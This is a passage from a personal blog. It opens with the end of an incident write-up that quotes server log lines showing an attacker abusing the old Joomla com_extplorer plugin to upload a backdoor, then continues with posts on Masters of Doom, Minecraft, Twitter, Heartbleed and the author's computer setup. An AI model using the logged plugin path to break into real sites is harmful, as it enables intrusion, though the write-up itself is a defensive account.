    88.198.59.38 - - [21/Jan/2015:18:55:28 +0100] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 5210 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    88.198.59.38 - - [21/Jan/2015:18:55:28 +0100] "POST /administrator/components//com_extplorer/ HTTP/1.1" 301 534 "http://www.staatsbladen.nl/administrator/components//com_extplorer/" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
    88.198.59.38 - - [21/Jan/2015:18:55:29 +0100] "POST /administrator/components//com_extplorer/ HTTP/1.1" 200 447 "http://www.staatsbladen.nl/administrator/components//com_extplorer/" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

    And a snippet from the error.log:

    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_File::closedir() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/functions.php on line 1169
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::msg() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/login.php on line 82
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::_get() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/application.php on line 63
    [Wed Jan 21 18:55:28 2015] [error] [client 88.198.59.38] PHP Strict Standards:  Non-static method ext_Lang::msg() should not be called statically in /var/www/wp.nl/administrator/components/com_extplorer/include/login.php on line 109

    And THERE.WE.GO.

    The com_extplorer plugin was abused to upload ONE file in January of this year. This sat around for almost ten months doing nothing! Until the hacker (or someone else) came across it and abused it.

    Needless to say com_extplorer is as old and as vulnerable as they come. I don’t even know why I had it. Trust me, it is gone (and Joomla is of course updated)!

    So there you have it. Quite a ride. My webserver/sites were hacked because of a dormant file, uploaded ten months ago through a buggy Joomla file explorer plugin on a site that I host. I don’t think the hacker who uploaded that file is necessarily the same one who started messing with my sites last week. It also looks a bit like bots/generators that continuously scan sites and execute standard commands. It could be one guy or more. Based on the spoofed IPs you can’t really tell.
    The strangest part is that I only found out because my WordPress site was acting strange. The Joomla site was fine. If this hadn’t happened I wouldn’t have found out (or only much later). Also, the thing the WordPress site was doing was quite useless (it was redirecting to my own site). I think someone/something (a script) messed up. And the Joomla site was serving a whole bunch of spam pages, so it was in the interest of whoever uploaded those that the server would keep running and that the backdoors would go unnoticed. And that might have happened if I hadn’t started investigating the WordPress site. This whole story shows that your entire webserver is only as secure as its weakest part.

  • Masters of Doom

    On my last vacation I finally got around to reading Masters of Doom by David Kushner. This book from 2003 keeps popping up every now and again and people always rave about it. I put it on my Amazon wish list years ago (which holds 50 books atm). But recently I came across it again, so it was time.

    And boy, what an absolute pleasure it was to read. From start to finish. It’s the story of id Software and mainly the two Johns (Carmack and Romero), the two founders who, as the book’s subtitle states, transformed pop culture with their games. This is not a lie. id Software single-handedly created the FPS genre with their Wolfenstein 3D, Doom and Quake games and was responsible for establishing the PC as a serious (gaming) platform in the 90s.

    Wolfenstein 3D

    This is not a book review. Just read the book, trust me you’ll enjoy it. There are a gazillion (positive) reviews available. This post is just a list of things that struck me while reading this masterpiece.

    • Arcade machines ruled the earth. Before anything else. I myself am too young to have experienced this phase. And I never understood why that was. What makes an arcade machine so different? This book explains it a bit.
    • The Apple II ruled after that. It is striking how important the Apple II and its programming environment were for both young Johns. It was the spark that set the flame.
    • After the first successes with id Software, Carmack was very keen on getting a NeXT computer (a machine created by, of course, Steve Jobs). He did most of his programming on it (note: Tim Berners-Lee created the WWW on a NeXT machine).
    • But the Apple II and subsequently the PC were really expensive and unattainable for both Johns. Carmack was even arrested for stealing one (and did time), and even when they started to have some success and were (secretly) starting id Software they ‘stole’ PCs from their employer because they still couldn’t afford their own.
    • Carmack often says how different the world is now: just get a cheap PC, internet and a Linux distro and you’re good to go. You can go and “create things from thin air”. But this is something we take so much for granted now that the value of it seems lost. I can’t shake the feeling that being denied access to a PC for so long solidified Carmack’s appreciation of, interest in, and relationship with the PC (deprivation pushes innovation).

      Doom
    • Nintendo’s Super Mario Bros. from 1985 was so far ahead of its time that it’s hard to put into perspective nowadays. Mario, a continuous side-scrolling game, had never been done before, and it took John Carmack several years before he could emulate it on a PC. I never realised this. Nintendo was on another level.
    • When Carmack figured out how to do side-scrolling, the whole team recreated the entire Mario game in a weekend (!) and offered it to Nintendo. They were impressed but weren’t interested in the PC market.
    • So their side-scrolling technique turned into Commander Keen, which was a massive success. (I myself spent many hours playing Keen; it was my introduction to gaming.)

      The first Commander Keen game
    • John Carmack is one of a kind. He invented so.many.things. He created the foundation for a stupendous number of techniques that are still in use in almost every current game (lighting, shading, networking, multiplayer etc. etc.). And he was so young while doing all that. (On the other hand: Linus was also just 21 when he put out a kernel: “won’t be big and professional”.)
    • My respect for Carmack’s technical abilities has only grown with this book. But I can’t deny he sometimes comes off as somewhat sociopathic, with little regard for other people’s feelings (especially when he was younger). He lives for and cares only about the now, the future and programming. The past seems utterly irrelevant to him (he didn’t even keep copies of his first games). But hey, maybe that combination is what drives innovation.
    • What I really liked about him though was/is his stance on open source software and his anti-patent views. The book Hackers (which I completely incidentally bought at the same time as this book!) was a great influence on young Carmack and shaped his views on software. A lot of his techniques and engines are open-sourced, but he also encouraged the modding and hacking of their games (I’d argue this added to their success).

    id Software

    • Shareware was also a large part of their success. Give away the first levels for free, and ask users to pay for the rest. This worked out really well for them, but this was before the internet as we know it now, where you can get anything (illegally). (Though Notch sort of did the same trick with Minecraft, I guess.) But I clearly and vividly remember that this is how I got Wolfenstein 3D myself as a 13/14-year-old. It was a 3.5″ disk attached to a PC magazine that I bought on vacation. Being very interested in anything WW2-related, this magazine stood out. And the game struck a chord with me; I played it many times on our 386SX and I always marvelled at how people could create something like this (3D!). (Fun and true fact: on the plane, while reading this book, the guy in front of me was playing Wolfenstein 3D on his tablet. Such a surreal experience.)
    • When id Software was coming up, the internet was just getting started: there were newsgroups, FTP and BBSes. But that was about it. Imagine the kind of earth-shattering experience the first networked multiplayer game must have been: Doom. (It was then that Romero coined the term deathmatch.)
    • The tabletop role-playing game Dungeons & Dragons is very, very important in id Software’s history and game concepts. A lot of elements in their games can be traced back to D&D. All early employees were avid players. I did not know this.
    • Games push innovation. You might not care about games (Carmack himself grew disinterested in games as the company grew), but games are largely responsible for driving and pushing the PC to where it is nowadays.
    • Virtual Reality was already something people were working on and thinking about in the 70s, 80s and 90s. It never worked. Carmack left id Software 2 years ago to work on the Oculus Rift VR headset. This could be it. The time might be now. Technology might finally be ready. And if there were only one person in the world who could pull it off, then you can rest assured that person is working on it right now: John Carmack.

      Do it, John.

    I could go on about the pizza and Diet Coke addictions, or the interesting relationship/energy between Romero and Carmack: they were a perfect match that pushed each other, but as they both grew, they grew apart. Or how Doom became part of everyday life and was the subject of public outcry following the Columbine shooting. But just read the book for yourself (or read about it here, here or here). It is ultimately a book about a couple of guys who started from the bottom and created a startup which in turn created an industry. A classic Silicon Valley rags-to-riches story.

  • The Minecraft timeline

    The story of Minecraft sounds like a great movie script. Notch as the protagonist genius programmer who, from an underdog (indie) position, single-handedly changed the game industry by just doing what he loved. And making a lot of money along the way. And even more money when he was fed up with it all and sold Minecraft.
    But perhaps a movie is unnecessary; it is all very well documented already. And most people are familiar with the story, partly because a lot of it happened online. So we have the blogs, websites, forum posts, tweets and YouTube videos. What we don’t have is a nice graphic timeline depicting the history (until now).

    I heard about Minecraft somewhere in 2010. And I started paying close attention to Minecraft and its creator, because even then it seemed like a great story. One guy and his computer changing the world. My favorite kind of story! And I clearly remember being awestruck on August 20th 2011, when Notch entered a game coding contest and livestreamed the whole thing, which he did regularly. (Mind you, the link is a condensed version; the whole thing lasted 48 hours.) This guy was something else! The wonders of game creation unfolded right before your eyes. Way too fast to take it all in, but it gave a great sense of what it means to create a game. Just him and his computer, with the Java IDE Eclipse and Paint.net: the same tools he used when creating Minecraft. (I later found out, through that contest, that there are many more competent programmers like him. Not everyone strikes gold. But then again, like Notch, most of them are not in it for that reason.)

    Minecraft is a unique story that deserves a nice looking timeline, and because I couldn’t find a decent one I made one:

    The information on this timeline is gathered from http://minecraft.gamepedia.com/

    Some notable things from this timeline:

    • Notch started working on Minecraft a few weeks before taking on a new job (at jAlbum: the software this site also uses!)
    • It took a year of development before he finally quit his ‘real’ job to focus on Minecraft. At that time some 20,000 copies had already been sold! While the game was still only in alpha. Promising, to say the least.
    • The second half of 2010 and 2011 must have been insane. They created the company around Minecraft: Mojang, hired a lot of people, made a ton of updates to the game, released a second game (completely different), talked with Valve, organised MineCon, had a lawsuit on their hands, and amidst all that they sold millions of copies of Minecraft!
    • A lot of important Minecraft things seem to have happened on June 1 a couple of years in a row (this also happens to be Notch’s birthday).

    The Minecraft story isn’t finished yet. Minecraft is of course very much alive and still setting records. But where Notch and Minecraft once were part of the same story they are now moving into separate timelines.

    But whatever happens next, the story of Minecraft will always be an inspiring one, and its impact on the game and entertainment industry will echo for years and years to come. That makes it even more special that, through the wonders of YouTube, we have this video from 2009: some unknown guy from Sweden showing a demo of something he built that might turn into a game.

  • If I were the CEO of Twitter

    I still love Twitter. I’ve been using it since 2009 and it holds a special place. For reasons that I only recently learned to put into words: Twitter is a protocol. It’s a (unique) way of communicating.

    I’m also still a big RSS user. Which is a different beast. Very useful, but a much more isolated experience. On Twitter you are connected and present in a visible manner. The RSS experience is much more like lurking in a dark corner. Nonetheless, there is room for that too. For me, Twitter and RSS are complementary to each other.

    Recently, there has been some unrest around Twitter. The stock is going down, the CEO has been replaced, and features are being removed. That last part is what bothers me the most. It seems the new approach is to dumb down Twitter as much as possible. I don’t like it. Maybe it’s going back to the roots of the core idea. Maybe it’s just trial-and-error management. I don’t know. But as a user I’d like to see new features. Features that don’t necessarily have to interfere with the core, basic Twitter experience, but that would improve and broaden the Twitter experience and the time spent on Twitter. So if I were the CEO of Twitter, I would add these:

    1. Improved, more selective, search

    I want to be able to search individual (including my own) timelines. I can never seem to find anything on Twitter.

    2. Diary (News Archive)

    I want to be able to select a date and see my timeline from *that* date. What did it look like last New Year’s Eve, or when MH17 went down? I think such a feature would be pretty great.

    3. Favorite vs. “like”

    I want to be able to acknowledge tweets that I enjoyed. Yes, there is the favorite button. But for me favoriting is the equivalent of bookmarking. I favorite things I want to get back to. So I don’t want to dilute my bookmarks with “likes”. So I’m strict with favoriting. I think there should be another/different button/heart.

    To me it seems Twitter is struggling with this. I believe favoriting started off as bookmarking, but people raised on Facebook took it for the Like button and Twitter just let that happen. If there were another way of letting people know that I enjoyed their tweets, there would be much more activity. From me at least. Favoriting something is a big deal, because it is stored in my favorites timeline forever and for all the world to see. Liking, not so much. I believe this to be one of the reasons for Instagram’s success: the way they implemented their “like” feature is low-key, and I don’t need to see what it was that I liked ever again.

    4. Curated feeds

    Until recently Twitter had a special (Activity) feed that let me see what the people in my timeline favorited. Even though I don’t use the favorite button like that myself (as explained), I loved this. That was a great feed and this is where I spent most of my time. That feed was like crack to me, because it is addictively more interesting to see what someone interesting finds interesting. For me, this is where 70% of the good stuff was. That feature is gone. I understand it might not be for everyone, but people like me lived there.

    Part of this problem might be that a lot of people merely seem interested in talking/yelling on Twitter so they have no interest in listening to others.

    Also, Twitter could use this ‘like’ info to show me the best tweets for a certain period. Say I have been away on vacation without an internet connection: just let me see the good stuff from the last month.

    And this same mechanism could also be used to separate the sense from the nonsense. I worry that a lot of (young) people seem to hit every follow button they come across, after which their Twitter timeline becomes an uncontrollable mess (bots with hundreds of tweets a day) to which they never return. Too much hassle. I’m very selective about who I follow, to keep a readable timeline. Again: this is me. But it is part of a larger problem for Twitter: creating a better experience where the better content sticks out more. Snapchat specifically (and probably incidentally) deals with this problem: stuff is just gone after a certain period.

    (By the way, the day Twitter decides what I see on my timeline and what I don’t (like Facebook) is the day I’m leaving Twitter.)

    5. Circles

    Yes, Google+ is turning out to be quite the debacle for Larry Page and friends. But I believe they got at least one thing right: Circles! Because of the mixed crowd that follows me on Twitter, I’m sort of selective in what I tweet. If I could make groups and choose which tweets are visible to which group, I would certainly tweet more, and I assume more people would too.

  • Thoughts on Heartbleed

    This week, part of the internet broke. Again. Some important people even called it an 11 on a scale from 1 to 10. And I don’t disagree. After the recent Apple goto fail SSL bug and the NSA/RSA debacle, this was actually worse.

    So everyone agreed on that. But three things regarding open source software stood out for me in all this.

    1. OpenSSL is a great example of a single open source product that makes up an incredibly fundamental part of the internet. But it is not a sexy project, (so) it doesn’t have a ton of developers. And now that it broke, we’ve seen the enormous impact that this piece of software, developed by only a handful of people, has on the lives of billions of people. Think about that for a minute. Every major website that I visit or am subscribed to has emailed me to change my passwords. And they’re not just emailing me. And this is just one open source product, developed by a small team that receives about $2,000 in donations per year!

    I think it speaks volumes of the power of open source and the impact you can make in contributing to it. I think that is quite magical.

    2. After the Heartbleed announcement the sentiment was: go update your OpenSSL packages and revoke and reissue your certificates!

    Great. Makes sense right?

    No. No, not really. Why on earth would we trust the OpenSSL codebase ever again after this disaster?! Theo de Raadt calls the developers irresponsible, and the respected author of Varnish wrote about the mess that is the OpenSSL codebase three years ago. He wouldn’t touch it with a ten-foot pole. Yet the overall sentiment seems to be that if you update your OpenSSL stack and revoke/reissue your certificates, you’re fine. Really?! What else is in there?!

    Part of the problem here is that there are no real alternatives. There are a couple of other SSL/TLS implementations, but that route seems more complicated than updating OpenSSL. So everyone is still using OpenSSL. But also, and this is very important, because no one seems to distrust the intentions of the OpenSSL team (there were some NSA-related conspiracy stories, but they got debunked). So it looks like “OpenSSL messed up, we fixed it, let’s move along”. And that is a good thing.

    So what happens next? Are more people reviewing the code? Are more donations coming in to fund this fundamental part of the internet (and therefore our lives)? I sure hope so. As for the people who discovered the bug (two different people), I hope they will use their skills to inform vendors/distros first, before picking a catchy name, registering a domain and creating a fancy logo to announce a big problem to the world. At least it looks like they’re trying to help now. And they didn’t sell it to blackhats (I think).

    3. So even though we have the source and we can look at it, the codebase is large and messy. In my estimation this is not unusual for open source projects with a long history. (However, the consequences for security-related projects tend to be bigger.) So this problem went unnoticed until someone pointed it out. Therefore more people looking at it, and more time dedicated to it, would make it (incrementally) better, I think. But there will always be bugs.

    So which is it?

    And that is the other side of open source software and software in general. Software is ‘OK’ until someone points out the bug. And everybody thought OpenSSL was secure. Until it wasn’t.

    It’s almost like Schrödinger’s cat paradox. Like software can be two things at once. We all trusted OpenSSL; it was, after all, the very definition of security. Until proven otherwise. And the bug was just ‘always’ right there.

    So I’d like to argue this: all software is broken by default. And all we can do is be on the lookout and fix problems when they arise.

    And at least in the case of OpenSSL we can look at the code and make it better. And I wouldn’t want it any other way.

  • jan.usesthis.com

    I always enjoy reading usesthis.com. Especially from “software people”. And I am always a bit surprised when I read what hardware some people use >8 hours a day. Some people really use some old stuff! You’d sort of expect that when you spend that much time working/interacting with tools, you’d want the best (newest?) tools. But then I realised I’m probably no different myself. So, since no-one asked, I’m going to do my own usesthis.com!

    Who are you, and what do you do?

    I am Jan and I work for a national ISP (ranked among the top 🙂 ). I started as a systems and networking engineer, and for the last couple of years I’ve been responsible for the Engineering department, where we create and maintain ISP services (mail, hosting, connectivity, IPTV, VoIP, mobile, etc.).

    What hardware do you use?

    My everyday workhorse is a Dell Latitude D820 from August 2006! It still runs the original XP installation (that will have to change soon). It is fast and stable. The only upgrade has been an SSD I added 2 years ago. (Best investment ever. Get one. Now.) I use this machine 8 hours a day. People often ask why XP, or why such an old laptop? But it just works. You can have all kinds of fancy setups, but I have never seen anyone pull up files, find an email, hit a link, or SSH to a host faster than myself. And if you have a trick or key combo that will do things — even just a tiny bit — faster, trust me, I will steal it from you.

    The machine is hooked up to a Dell U2211H screen. I literally found this screen somewhere in one of our offices ~4 years ago and it has been with me since. Mouse and keyboard are also as old as I can remember. Both Logitech. Probably my 2nd mouse/keyboard in my 10+ years here.

    At home I use a stock 2010 Lenovo ThinkPad SL510. Great keyboard! The Windows 7 that came with it was OK, but it got slower each month. So I have been a rather happy Lubuntu user since. But if my Dell Inspiron 6400 from 2006 hadn’t broken, I’d probably still be using that. Lubuntu 13.10 is fast, the opposite of bloated, and Debian-based (I need apt). So it does the trick. (If you still don’t know what to do now that XP is going, you should give it a try.)

    I have an iPhone 4 16GB. So that’s a 4, not a 4S. I got it because my 3GS fell in the toilet 2 years ago. It works.

    Last year I got an iPad Mini which goes with me everywhere. There hasn’t been a day since that I didn’t use it. I have a lot of meetings and this thing is perfect for that. I tried a regular sized iPad before but found it too big/clunky. The Mini is the perfect size for reading meeting notes, agendas etc.

    Both Apple devices still run iOS6. Why? You guessed it: speed.

    Besides that I have one prominent personal toy: Nikon D3100 (because my beloved D40 and 35mm got stolen).

    See what happens when you say it’s stable?!

    And what software?

    Most work nowadays is done in the browser. I used to be big on Firefox but have been a steady Chrome user for ~4 years, because it’s faster (or feels that way). A lot of our in-house software is web-based (agenda, planning, CRM, mail) so I spend a lot of time in the browser. I also have large MP3 collections that I manage with MediaMonkey or Audacious. But creating playlists on YouTube is actually how I listen to most music now. For plowing through a lot of (IMAP) mail I use Thunderbird on Windows and Sylpheed on Lubuntu. Thunderbird renders email a bit nicer and has great search features, but is heavier. So Sylpheed is (you guessed it!) faster. And moving mail with the keyboard is implemented in the best possible way that I know of. Thunderbird with the Nostalgy plugin is alright, but not quite the same. At work I have a mouse/keyboard setup so it is doable; at home with a trackpad it would be undoable.

    We manage a _lot_ of Debian servers and network devices and use Password Safe for storing passwords and keys (works on both Linux and Windows). We keep the password files in SVN. I use TortoiseSVN because it integrates nicely with the Windows shell, or on Linux just plain old command line svn(1). We’re moving to two-factor authentication, so a YubiKey is plugged into my laptop.

    I use a PuTTY fork called KiTTY as my SSH client because it has a couple of nice extra features (duplicate sessions etc.). And on Lubuntu I use LXTerminal.

    On servers the main piece of software I use is probably Vim. I know my way around Vim. But I also know I probably know nothing about Vim even after 10+ years.

    For IM I use Pidgin: one IM client to rule them all (both Linux and Windows). Besides that, the following software on Windows: Notepad++, FileZilla, MS Office/LibreOffice and one notable: FSCapture. I also own a mIRC license! (One of the few people, I guess.)

    So most times I have four programs running: Chrome, a mail reader (Thunderbird/Sylpheed), SSH clients (kiTTY/LXTerminal), Pidgin.

    Pretty boring huh 🙂

    What would be your dream setup?

    I have two thoughts here.

    1. As you might have guessed by now, I’m all about speed and efficiency (my laptops have black wallpapers). I don’t like waiting. It breaks focus, it’s inefficient. But I also use pretty old hardware. What that says is that the way I use computers hasn’t really changed in 10+ years (or that I’m pretty conservative). But the thing is that adding hardware will not significantly add speed to my workflow. In the 90s every new CPU or extra piece of RAM would directly improve performance. This is just not the case anymore. Adding an SSD was the only thing to make a difference in the last 8 years. And I only occasionally wish for a multi-core i7, e.g. when rendering a movie.

    Also, with cloud/browser software and smartphones we’re (again) moving to very smart but still “dumb” terminals (remember the 70s?). It seems we’re heading to a point where you have a single sign-on and everything is just there. And the device or OS is not an issue (at least that’s what Google would like).

    So I wish for things like: solar-powered laptops/tablets/phones (or long, long, long battery life). Cheap, easy, redundant storage, because of digital stress (i.e. my ever-growing personal photo and movie collection). But mostly, hardware is just a tool. It shouldn’t really matter what tool you use to get the job done.

    2. Saying my way of ‘desktopping’ hasn’t really changed in some years doesn’t make me less excited about the future. I believe we live in a wonderful time. We’re still at the forefront of the IT revolution (smartphones are just a couple of years old) and I expect great things. A lot of things that will be used in 100 years will be discovered/developed today. And it might not be directly so, but the ideas and dreams will come from this era. Execution can come later.

    (I stole this next idea from Paul Graham.) Throughout history we’ve seen eras of painters (Rembrandt), classical composers (Mozart, Beethoven) and theatre (Shakespeare). All three are fields where most of the innovation happened close to the start of the revolution, and we have only been iterating ever since. I believe we are in that era for IT now. And we can all be part of it.